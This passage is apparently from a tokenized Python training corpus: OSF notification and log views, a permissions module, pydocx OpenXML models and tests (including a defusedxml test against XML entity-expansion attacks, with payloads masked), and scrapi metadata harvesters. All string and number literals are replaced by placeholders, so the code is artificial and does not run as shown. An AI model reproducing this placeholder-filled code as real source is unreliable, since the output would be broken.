query : <EOL> yield subscription <EOL> def get_all_node_subscriptions ( user , node , user_subscriptions = None ) : <EOL> """<STR_LIT>""" <EOL> if not user_subscriptions : <EOL> user_subscriptions = get_all_user_subscriptions ( user ) <EOL> for subscription in user_subscriptions : <EOL> if subscription and subscription . owner == node : <EOL> yield subscription <EOL> def format_data ( user , node_ids ) : <EOL> """<STR_LIT>""" <EOL> items = [ ] <EOL> for node_id in node_ids : <EOL> node = Node . load ( node_id ) <EOL> assert node , '<STR_LIT>' . format ( node_id ) <EOL> can_read = node . has_permission ( user , '<STR_LIT>' ) <EOL> can_read_children = node . has_permission_on_children ( user , '<STR_LIT>' ) <EOL> if not can_read and not can_read_children : <EOL> continue <EOL> children = [ ] <EOL> if can_read : <EOL> node_sub_available = list ( constants . NODE_SUBSCRIPTIONS_AVAILABLE . keys ( ) ) <EOL> subscriptions = [ subscription for subscription in get_all_node_subscriptions ( user , node ) <EOL> if getattr ( subscription , '<STR_LIT>' ) in node_sub_available ] <EOL> for subscription in subscriptions : <EOL> index = node_sub_available . index ( getattr ( subscription , '<STR_LIT>' ) ) <EOL> children . append ( serialize_event ( user , subscription = subscription , <EOL> node = node , event_description = node_sub_available . pop ( index ) ) ) <EOL> for node_sub in node_sub_available : <EOL> children . append ( serialize_event ( user , node = node , event_description = node_sub ) ) <EOL> children . sort ( key = lambda s : s [ '<STR_LIT>' ] [ '<STR_LIT:title>' ] ) <EOL> children . extend ( format_data ( <EOL> user , <EOL> [ <EOL> n . _id <EOL> for n in node . nodes <EOL> if n . primary and <EOL> not n . is_deleted <EOL> ] <EOL> ) ) <EOL> item = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : node_id , <EOL> '<STR_LIT:url>' : node . url if can_read else '<STR_LIT>' , <EOL> '<STR_LIT:title>' : node . title if can_read else '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : children , <EOL> '<STR_LIT>' : '<STR_LIT>' if not node . node__parent or not node . parent_node . has_permission ( user , '<STR_LIT>' ) else '<STR_LIT>' , <EOL> '<STR_LIT>' : node . project_or_component , <EOL> '<STR_LIT>' : node . category , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : can_read , <EOL> } , <EOL> } <EOL> items . append ( item ) <EOL> return items <EOL> def format_user_subscriptions ( user ) : <EOL> """<STR_LIT>""" <EOL> user_subs_available = list ( constants . USER_SUBSCRIPTIONS_AVAILABLE . keys ( ) ) <EOL> subscriptions = [ <EOL> serialize_event ( <EOL> user , subscription , <EOL> event_description = user_subs_available . pop ( user_subs_available . index ( getattr ( subscription , '<STR_LIT>' ) ) ) <EOL> ) <EOL> for subscription in get_all_user_subscriptions ( user ) <EOL> if subscription is not None and getattr ( subscription , '<STR_LIT>' ) in user_subs_available <EOL> ] <EOL> subscriptions . extend ( [ serialize_event ( user , event_description = sub ) for sub in user_subs_available ] ) <EOL> return subscriptions <EOL> def format_file_subscription ( user , node_id , path , provider ) : <EOL> """<STR_LIT>""" <EOL> node = Node . load ( node_id ) <EOL> wb_path = path . lstrip ( '<STR_LIT:/>' ) <EOL> for subscription in get_all_node_subscriptions ( user , node ) : <EOL> if wb_path in getattr ( subscription , '<STR_LIT>' ) : <EOL> return serialize_event ( user , subscription , node ) <EOL> return serialize_event ( user , node = node , event_description = '<STR_LIT>' ) <EOL> def serialize_event ( user , subscription = None , node = None , event_description = None ) : <EOL> """<STR_LIT>""" <EOL> all_subs = constants . NODE_SUBSCRIPTIONS_AVAILABLE . copy ( ) <EOL> all_subs . update ( constants . USER_SUBSCRIPTIONS_AVAILABLE ) <EOL> if not event_description : <EOL> event_description = getattr ( subscription , '<STR_LIT>' ) <EOL> for sub_type in all_subs : <EOL> if sub_type in event_description : <EOL> event_type = sub_type <EOL> else : <EOL> event_type = event_description <EOL> if node and node . node__parent : <EOL> notification_type = '<STR_LIT>' <EOL> else : <EOL> notification_type = '<STR_LIT:none>' <EOL> if subscription : <EOL> for n_type in constants . NOTIFICATION_TYPES : <EOL> if user in getattr ( subscription , n_type ) : <EOL> notification_type = n_type <EOL> return { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:title>' : event_description , <EOL> '<STR_LIT:description>' : all_subs [ event_type ] , <EOL> '<STR_LIT>' : notification_type , <EOL> '<STR_LIT>' : get_parent_notification_type ( node , event_type , user ) <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] <EOL> } <EOL> def get_parent_notification_type ( node , event , user ) : <EOL> """<STR_LIT>""" <EOL> if node and isinstance ( node , Node ) and node . node__parent and node . parent_node . has_permission ( user , '<STR_LIT>' ) : <EOL> for parent in node . node__parent : <EOL> key = to_subscription_key ( parent . _id , event ) <EOL> try : <EOL> subscription = model . NotificationSubscription . find_one ( Q ( '<STR_LIT>' , '<STR_LIT>' , key ) ) <EOL> except NoResultsFound : <EOL> return get_parent_notification_type ( parent , event , user ) <EOL> for notification_type in constants . NOTIFICATION_TYPES : <EOL> if user in getattr ( subscription , notification_type ) : <EOL> return notification_type <EOL> else : <EOL> return get_parent_notification_type ( parent , event , user ) <EOL> else : <EOL> return None <EOL> def format_user_and_project_subscriptions ( user ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : user . _id , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : format_user_subscriptions ( user ) <EOL> } , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : format_data ( user , get_configured_projects ( user ) ) <EOL> } ] </s>
<s> import httplib as http <EOL> import logging <EOL> import math <EOL> from flask import request <EOL> from framework . exceptions import HTTPError <EOL> from framework . auth . decorators import collect_auth <EOL> from framework . transactions . handlers import no_auto_transaction <EOL> from website . views import serialize_log , validate_page_num <EOL> from website . project . model import NodeLog <EOL> from website . project . model import has_anonymous_link <EOL> from website . project . decorators import must_be_valid_project <EOL> logger = logging . getLogger ( __name__ ) <EOL> @ collect_auth <EOL> @ no_auto_transaction <EOL> def get_log ( auth , log_id ) : <EOL> log = NodeLog . load ( log_id ) <EOL> node_to_use = log . node <EOL> if not node_to_use . can_view ( auth ) : <EOL> raise HTTPError ( http . FORBIDDEN ) <EOL> return { '<STR_LIT>' : serialize_log ( log , auth = auth ) } <EOL> def _get_logs ( node , count , auth , page = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> logs_set = node . get_aggregate_logs_queryset ( auth ) <EOL> total = logs_set . count ( ) <EOL> pages = math . ceil ( total / float ( count ) ) <EOL> validate_page_num ( page , pages ) <EOL> start = page * count <EOL> stop = start + count <EOL> logs = [ <EOL> serialize_log ( log , auth = auth , anonymous = has_anonymous_link ( node , auth ) ) <EOL> for log in logs_set [ start : stop ] <EOL> ] <EOL> return logs , total , pages <EOL> @ no_auto_transaction <EOL> @ collect_auth <EOL> @ must_be_valid_project ( retractions_valid = True ) <EOL> def get_logs ( auth , node , ** kwargs ) : <EOL> """<STR_LIT:U+0020>""" <EOL> try : <EOL> page = int ( request . args . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> except ValueError : <EOL> raise HTTPError ( http . BAD_REQUEST , data = dict ( <EOL> message_long = '<STR_LIT>' <EOL> ) ) <EOL> if not node . can_view ( auth ) : <EOL> raise HTTPError ( http . FORBIDDEN ) <EOL> if '<STR_LIT:count>' in request . args : <EOL> count = int ( request . args [ '<STR_LIT:count>' ] ) <EOL> elif '<STR_LIT:count>' in kwargs : <EOL> count = kwargs [ '<STR_LIT:count>' ] <EOL> elif request . json and '<STR_LIT:count>' in request . json . keys ( ) : <EOL> count = request . json [ '<STR_LIT:count>' ] <EOL> else : <EOL> count = <NUM_LIT:10> <EOL> logs , total , pages = _get_logs ( node , count , auth , page ) <EOL> return { '<STR_LIT>' : logs , '<STR_LIT>' : total , '<STR_LIT>' : pages , '<STR_LIT>' : page } </s>
<s> READ = '<STR_LIT>' <EOL> WRITE = '<STR_LIT>' <EOL> ADMIN = '<STR_LIT>' <EOL> PERMISSIONS = [ READ , WRITE , ADMIN ] <EOL> CREATOR_PERMISSIONS = [ READ , WRITE , ADMIN ] <EOL> DEFAULT_CONTRIBUTOR_PERMISSIONS = [ READ , WRITE ] <EOL> def expand_permissions ( permission ) : <EOL> if not permission : <EOL> return [ ] <EOL> index = PERMISSIONS . index ( permission ) + <NUM_LIT:1> <EOL> return PERMISSIONS [ : index ] <EOL> def reduce_permissions ( permissions ) : <EOL> for permission in PERMISSIONS [ : : - <NUM_LIT:1> ] : <EOL> if permission in permissions : <EOL> return permission <EOL> raise ValueError ( '<STR_LIT>' ) </s>
<s> from pydocx . openxml . packaging . font_table_part import FontTablePart <EOL> from pydocx . openxml . packaging . footnotes_part import FootnotesPart <EOL> from pydocx . openxml . packaging . image_part import ImagePart <EOL> from pydocx . openxml . packaging . main_document_part import MainDocumentPart <EOL> from pydocx . openxml . packaging . numbering_definitions_part import NumberingDefinitionsPart <EOL> from pydocx . openxml . packaging . open_xml_package import OpenXmlPackage <EOL> from pydocx . openxml . packaging . open_xml_part import OpenXmlPart <EOL> from pydocx . openxml . packaging . open_xml_part_container import OpenXmlPartContainer <EOL> from pydocx . openxml . packaging . style_definitions_part import StyleDefinitionsPart <EOL> from pydocx . openxml . packaging . word_processing_document import WordprocessingDocument <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from __future__ import ( <EOL> absolute_import , <EOL> print_function , <EOL> unicode_literals , <EOL> ) <EOL> from pydocx . models import XmlModel , XmlAttribute <EOL> class FootnoteReference ( XmlModel ) : <EOL> XML_TAG = '<STR_LIT>' <EOL> footnote_id = XmlAttribute ( name = '<STR_LIT:id>' ) <EOL> @ property <EOL> def footnote ( self ) : <EOL> if not self . footnote_id : <EOL> return <EOL> part = self . container . footnotes_part <EOL> if not part : <EOL> return <EOL> footnotes = part . footnotes <EOL> footnote = footnotes . get_footnote_by_id ( footnote_id = self . footnote_id ) <EOL> return footnote </s>
<s> from __future__ import ( <EOL> absolute_import , <EOL> print_function , <EOL> unicode_literals , <EOL> ) <EOL> from pydocx . models import XmlModel , XmlCollection <EOL> from pydocx . openxml . wordprocessing . table_cell import TableCell <EOL> class TableRow ( XmlModel ) : <EOL> XML_TAG = '<STR_LIT>' <EOL> cells = XmlCollection ( <EOL> TableCell , <EOL> ) </s>
<s> from __future__ import ( <EOL> absolute_import , <EOL> print_function , <EOL> unicode_literals , <EOL> ) <EOL> from nose import SkipTest <EOL> from pydocx . test import DocumentGeneratorTestCase <EOL> from pydocx . test . utils import WordprocessingDocumentFactory <EOL> from pydocx . openxml . packaging import MainDocumentPart <EOL> class XMLVulnerabilitiesTestCase ( DocumentGeneratorTestCase ) : <EOL> def test_exponential_entity_expansion ( self ) : <EOL> try : <EOL> import defusedxml <EOL> except ImportError : <EOL> defusedxml = None <EOL> if defusedxml is None : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> document_xml = '''<STR_LIT>''' <EOL> xml_header = '''<STR_LIT>''' <EOL> document = WordprocessingDocumentFactory ( xml_header = xml_header ) <EOL> document . add ( MainDocumentPart , document_xml ) <EOL> expected_html = '<STR_LIT>' <EOL> try : <EOL> self . assert_document_generates_html ( document , expected_html ) <EOL> raise AssertionError ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> except defusedxml . EntitiesForbidden : <EOL> pass <EOL> def test_entity_blowup ( self ) : <EOL> try : <EOL> import defusedxml <EOL> except ImportError : <EOL> defusedxml = None <EOL> if defusedxml is None : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> document_xml = '''<STR_LIT>''' <EOL> xml_header = '''<STR_LIT>''' <EOL> document = WordprocessingDocumentFactory ( xml_header = xml_header ) <EOL> document . add ( MainDocumentPart , document_xml ) <EOL> expected_html = '<STR_LIT>' <EOL> try : <EOL> self . assert_document_generates_html ( document , expected_html ) <EOL> raise AssertionError ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> except defusedxml . EntitiesForbidden : <EOL> pass </s>
<s> from __future__ import ( <EOL> absolute_import , <EOL> print_function , <EOL> unicode_literals , <EOL> ) <EOL> from unittest import TestCase <EOL> from pydocx . exceptions import MalformedDocxException <EOL> from pydocx . util . xml import ( <EOL> el_iter , <EOL> parse_xml_from_string , <EOL> xml_remove_namespaces , <EOL> xml_tag_split , <EOL> XmlNamespaceManager , <EOL> ) <EOL> def elements_to_tags ( elements ) : <EOL> for element in elements : <EOL> yield element . tag <EOL> def make_xml ( s ) : <EOL> xml = b'<STR_LIT>' + s <EOL> return parse_xml_from_string ( xml ) <EOL> def remove_whitespace ( s ) : <EOL> return '<STR_LIT>' . join ( s . split ( ) ) <EOL> class UtilsTestCase ( TestCase ) : <EOL> def test_el_iter ( self ) : <EOL> root = make_xml ( b'<STR_LIT>' ) <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = el_iter ( root ) <EOL> self . assertEqual ( list ( elements_to_tags ( result ) ) , expected ) <EOL> def test_remove_namespaces ( self ) : <EOL> xml = b'''<STR_LIT>''' <EOL> expected = '<STR_LIT>' <EOL> result = xml_remove_namespaces ( xml ) <EOL> assert isinstance ( result , bytes ) <EOL> result = remove_whitespace ( result . decode ( '<STR_LIT:utf-8>' ) ) <EOL> self . assertEqual ( result , expected ) <EOL> def test_remove_namespaces_on_namespaceless_xml ( self ) : <EOL> xml = b'<STR_LIT>' <EOL> expected = '<STR_LIT>' <EOL> result = xml_remove_namespaces ( xml ) <EOL> assert isinstance ( result , bytes ) <EOL> result = remove_whitespace ( result . decode ( '<STR_LIT:utf-8>' ) ) <EOL> self . assertEqual ( result , expected ) <EOL> def test_remove_namespaces_junk_xml_causes_malformed_exception ( self ) : <EOL> self . assertRaises ( <EOL> MalformedDocxException , <EOL> lambda : xml_remove_namespaces ( '<STR_LIT:foo>' ) <EOL> ) <EOL> def test_xml_tag_split ( self ) : <EOL> self . assertEqual ( xml_tag_split ( '<STR_LIT>' ) , ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) ) <EOL> self . assertEqual ( xml_tag_split ( '<STR_LIT:bar>' ) , ( None , '<STR_LIT:bar>' ) ) <EOL> class XmlNamespaceManagerTestCase ( TestCase ) : <EOL> def test_namespace_manager ( self ) : <EOL> xml = '''<STR_LIT>''' <EOL> root = parse_xml_from_string ( xml ) <EOL> manager = XmlNamespaceManager ( ) <EOL> manager . add_namespace ( '<STR_LIT>' ) <EOL> tags = [ ] <EOL> for element in manager . iterate_children ( root ) : <EOL> tags . append ( element . tag ) <EOL> expected_tags = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . assertEqual ( tags , expected_tags ) <EOL> manager . add_namespace ( '<STR_LIT>' ) <EOL> tags = [ ] <EOL> for element in manager . iterate_children ( root ) : <EOL> tags . append ( element . tag ) <EOL> expected_tags = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . assertEqual ( tags , expected_tags ) <EOL> manager = XmlNamespaceManager ( ) <EOL> manager . add_namespace ( '<STR_LIT>' ) <EOL> tags = [ ] <EOL> for element in manager . iterate_children ( root ) : <EOL> tags . append ( element . tag ) <EOL> expected_tags = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . assertEqual ( tags , expected_tags ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from scrapi . base import OAIHarvester <EOL> class ArxivHarvester ( OAIHarvester ) : <EOL> short_name = '<STR_LIT>' <EOL> long_name = '<STR_LIT>' <EOL> url = '<STR_LIT>' <EOL> timeout = <NUM_LIT:30> <EOL> base_url = '<STR_LIT>' <EOL> property_list = [ <EOL> '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT:date>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:description>' <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import datetime <EOL> import json <EOL> import logging <EOL> import sys <EOL> from itertools import chain <EOL> from lxml import etree <EOL> from scrapi import requests <EOL> from scrapi import settings <EOL> from scrapi . base import XMLHarvester <EOL> from scrapi . base . helpers import build_properties , compose , single_result , datetime_formatter <EOL> from scrapi . linter . document import RawDocument <EOL> logger = logging . getLogger ( __name__ ) <EOL> def collapse_list ( list_of_strings ) : <EOL> text = '<STR_LIT>' . join ( list_of_strings ) <EOL> return text <EOL> def elife_name_parser ( names ) : <EOL> contributors = [ ] <EOL> for i in range ( <NUM_LIT:0> , len ( names ) , <NUM_LIT:2> ) : <EOL> chunka = names [ i : i + <NUM_LIT:2> ] <EOL> chunkb = chunka [ <NUM_LIT:1> ] . split ( "<STR_LIT:U+0020>" ) <EOL> name = ( chunka + chunkb ) <EOL> del name [ <NUM_LIT:1> ] <EOL> contributors . append ( name ) <EOL> parsed_contributors = [ ] <EOL> for contributor in contributors : <EOL> if sys . version_info < ( <NUM_LIT:3> , ) : <EOL> contributor = map ( lambda x : x . encode ( '<STR_LIT:utf-8>' ) , contributor ) <EOL> if len ( contributor ) == <NUM_LIT:3> : <EOL> full_name = contributor [ <NUM_LIT:1> ] + str ( "<STR_LIT:U+0020>" ) + contributor [ <NUM_LIT:2> ] + str ( "<STR_LIT:U+0020>" ) + contributor [ <NUM_LIT:0> ] <EOL> first_name = contributor [ <NUM_LIT:1> ] <EOL> middle_name = contributor [ <NUM_LIT:2> ] <EOL> last_name = contributor [ <NUM_LIT:0> ] <EOL> else : <EOL> full_name = contributor [ <NUM_LIT:1> ] + str ( "<STR_LIT:U+0020>" ) + contributor [ <NUM_LIT:0> ] <EOL> first_name = contributor [ <NUM_LIT:1> ] <EOL> middle_name = "<STR_LIT>" <EOL> last_name = contributor [ <NUM_LIT:0> ] <EOL> contributor_dict = { <EOL> '<STR_LIT:name>' : full_name , <EOL> '<STR_LIT>' : first_name , <EOL> '<STR_LIT>' : middle_name , <EOL> '<STR_LIT>' : last_name <EOL> } <EOL> parsed_contributors . append ( contributor_dict ) <EOL> return parsed_contributors <EOL> def elife_date_parser ( date ) : <EOL> date_form = datetime . datetime ( int ( date [ <NUM_LIT:2> ] ) , int ( date [ <NUM_LIT:1> ] ) , int ( date [ <NUM_LIT:0> ] ) , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> return date_form . date ( ) . isoformat ( ) <EOL> def fetch_commits ( base_url , start_date , end_date ) : <EOL> jsonstr = "<STR_LIT>" <EOL> i = <NUM_LIT:1> <EOL> while True : <EOL> resp = requests . get ( base_url , params = { <EOL> '<STR_LIT>' : start_date , <EOL> '<STR_LIT>' : end_date , <EOL> '<STR_LIT>' : i , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> } ) <EOL> jsonchunk = resp . content . decode ( '<STR_LIT:utf-8>' ) <EOL> if len ( jsonchunk ) <= <NUM_LIT:2> : <EOL> break <EOL> i += <NUM_LIT:1> <EOL> jsonchunk = jsonchunk . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> jsonchunk = jsonchunk [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> jsonstr = jsonstr + "<STR_LIT>" + jsonchunk <EOL> jsonarr = jsonstr . split ( '<STR_LIT>' ) [ <NUM_LIT:1> : ] <EOL> shas = [ ] <EOL> for jsonstring in jsonarr : <EOL> jsonobj = json . loads ( jsonstring ) <EOL> shas . append ( jsonobj [ '<STR_LIT>' ] ) <EOL> return shas <EOL> def fetch_file_names ( commit_url , sha ) : <EOL> resp = requests . get ( commit_url . format ( sha ) ) <EOL> jsonstr = resp . content . decode ( '<STR_LIT:utf-8>' ) <EOL> jsonobj = json . loads ( jsonstr ) <EOL> files = [ d [ '<STR_LIT:filename>' ] for d in jsonobj [ '<STR_LIT>' ] ] <EOL> return files <EOL> def fetch_xml ( xml_url , filename ) : <EOL> xml_text = requests . get ( xml_url . format ( filename ) ) . content <EOL> xml = etree . fromstring ( xml_text ) <EOL> return xml <EOL> class ELifeHarvester ( XMLHarvester ) : <EOL> short_name = '<STR_LIT>' <EOL> long_name = '<STR_LIT>' <EOL> url = '<STR_LIT>' <EOL> DEFAULT_ENCODING = '<STR_LIT>' <EOL> record_encoding = None <EOL> namespaces = { } <EOL> MAX_ROWS_PER_REQUEST = <NUM_LIT> <EOL> BASE_URL = '<STR_LIT>' <EOL> BASE_COMMIT_URL = '<STR_LIT>' <EOL> BASE_DATA_URL = '<STR_LIT>' <EOL> def harvest ( self , start_date = None , end_date = None ) : <EOL> start_date = start_date or datetime . date . today ( ) - datetime . timedelta ( settings . DAYS_BACK ) <EOL> end_date = end_date or datetime . date . today ( ) <EOL> shas = fetch_commits ( self . BASE_URL , start_date . isoformat ( ) , end_date . isoformat ( ) ) <EOL> files = list ( set ( chain . from_iterable ( [ <EOL> fetch_file_names ( self . BASE_COMMIT_URL , sha ) <EOL> for sha in shas ] ) ) ) <EOL> files = filter ( lambda filename : filename . endswith ( '<STR_LIT>' ) , files ) <EOL> xml_records = [ <EOL> fetch_xml ( self . BASE_DATA_URL , filename ) <EOL> for filename in files <EOL> ] <EOL> return [ <EOL> RawDocument ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:source>' : self . short_name , <EOL> '<STR_LIT>' : etree . tostring ( record ) , <EOL> '<STR_LIT>' : record . xpath ( '<STR_LIT>' ) [ <NUM_LIT:0> ] . text , <EOL> } ) for record in xml_records <EOL> ] <EOL> schema = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , compose ( '<STR_LIT>' . format , <EOL> single_result ) ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , compose ( '<STR_LIT>' . format , single_result ) ) <EOL> } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , elife_name_parser ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , <EOL> compose ( datetime_formatter , elife_date_parser ) ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , collapse_list ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , collapse_list ) , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , single_result ) <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , <EOL> elife_date_parser ) <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : build_properties ( <EOL> ( '<STR_LIT>' , ( '<STR_LIT>' , single_result ) ) <EOL> ) <EOL> } </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import json <EOL> import logging <EOL> from datetime import date , timedelta <EOL> import six <EOL> from scrapi import requests <EOL> from scrapi import settings <EOL> from scrapi . base import JSONHarvester <EOL> from scrapi . linter . document import RawDocument <EOL> from scrapi . base . helpers import build_properties , datetime_formatter <EOL> logger = logging . getLogger ( __name__ ) <EOL> def process_NSF_contributors ( firstname , lastname , awardeename ) : <EOL> return [ <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' . format ( firstname , lastname ) , <EOL> '<STR_LIT>' : firstname , <EOL> '<STR_LIT>' : lastname , <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : awardeename <EOL> } <EOL> ] <EOL> def process_nsf_uris ( awd_id ) : <EOL> nsf_url = '<STR_LIT>' . format ( awd_id ) <EOL> return { <EOL> '<STR_LIT>' : nsf_url , <EOL> '<STR_LIT>' : [ nsf_url ] <EOL> } <EOL> def process_sponsorships ( agency , awd_id , title ) : <EOL> return [ <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : agency <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( awd_id ) , <EOL> '<STR_LIT>' : title <EOL> } <EOL> } <EOL> ] <EOL> class NSFAwards ( JSONHarvester ) : <EOL> short_name = '<STR_LIT>' <EOL> long_name = '<STR_LIT>' <EOL> url = '<STR_LIT>' <EOL> URL = '<STR_LIT>' <EOL> schema = { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , process_NSF_contributors ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , datetime_formatter ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , process_nsf_uris ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , process_sponsorships ) , <EOL> '<STR_LIT>' : build_properties ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> } <EOL> def harvest ( self , start_date = None , end_date = None ) : <EOL> start_date = start_date if start_date else date . today ( ) - timedelta ( settings . DAYS_BACK ) <EOL> end_date = end_date - timedelta ( <NUM_LIT:1> ) if end_date else date . today ( ) - timedelta ( <NUM_LIT:1> ) <EOL> search_url = '<STR_LIT>' . format ( <EOL> self . URL , <EOL> start_date . strftime ( '<STR_LIT>' ) , <EOL> end_date . strftime ( '<STR_LIT>' ) <EOL> ) <EOL> records = self . get_records ( search_url ) <EOL> record_list = [ ] <EOL> for record in records : <EOL> doc_id = record [ '<STR_LIT:id>' ] <EOL> record_list . append ( <EOL> RawDocument ( <EOL> { <EOL> '<STR_LIT>' : json . dumps ( record ) , <EOL> '<STR_LIT:source>' : self . short_name , <EOL> '<STR_LIT>' : six . text_type ( doc_id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ) <EOL> ) <EOL> return record_list <EOL> def get_records ( self , search_url ) : <EOL> records = requests . get ( search_url ) . json ( ) [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) <EOL> offset = <NUM_LIT:1> <EOL> all_records = [ ] <EOL> while len ( records ) == <NUM_LIT> : <EOL> for record in records : <EOL> all_records . append ( record ) <EOL> offset += <NUM_LIT> <EOL> records = requests . get ( search_url + '<STR_LIT>' . format ( str ( offset ) ) , throttle = <NUM_LIT:3> ) . json ( ) [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) <EOL> all_records . extend ( records ) <EOL> return all_records </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from scrapi . base import OAIHarvester <EOL> class UCeScholarshipHarvester ( OAIHarvester ) : <EOL> short_name = '<STR_LIT>' <EOL> long_name = '<STR_LIT>' <EOL> url = '<STR_LIT>' <EOL> base_url = '<STR_LIT>' <EOL> property_list = [ <EOL> '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT:date>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:source>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] </s>
<s> from scrapi . linter . document import RawDocument , NormalizedDocument </s>
<s> import vcr <EOL> import mock <EOL> import pytest <EOL> from scrapi import requests <EOL> from scrapi . base import helpers <EOL> @ pytest . fixture ( autouse = True ) <EOL> def mock_maybe_load_response ( monkeypatch ) : <EOL> mock_mlr = mock . Mock ( ) <EOL> mock_mlr . return_value = None <EOL> mock_save = lambda x : x <EOL> monkeypatch . setattr ( requests , '<STR_LIT>' , mock_mlr ) <EOL> monkeypatch . setattr ( requests . HarvesterResponse , '<STR_LIT>' , mock_save ) <EOL> class TestHelpers ( object ) : <EOL> def test_format_one_tag ( self ) : <EOL> single_tag = '<STR_LIT>' <EOL> single_output = helpers . format_tags ( single_tag ) <EOL> assert single_output == [ '<STR_LIT>' ] <EOL> assert isinstance ( single_output , list ) <EOL> def test_format_many_tags ( self ) : <EOL> many_tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> many_output = helpers . format_tags ( many_tags ) <EOL> assert set ( many_output ) == set ( [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_format_sep_tags ( self ) : <EOL> sep_tags = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> sep_output = helpers . format_tags ( sep_tags , sep = '<STR_LIT:U+002C>' ) <EOL> assert set ( sep_output ) == set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_extract_dois ( self ) : <EOL> identifiers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> valid_dois = helpers . oai_extract_dois ( identifiers ) <EOL> assert valid_dois == [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> def oai_process_uris ( self ) : <EOL> identifiers = [ '<STR_LIT>' ] <EOL> with pytest . raises ( ValueError ) : <EOL> helpers . oai_extract_url ( identifiers ) <EOL> def test_extract_uris ( self ) : <EOL> identifiers = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> uri_dict = 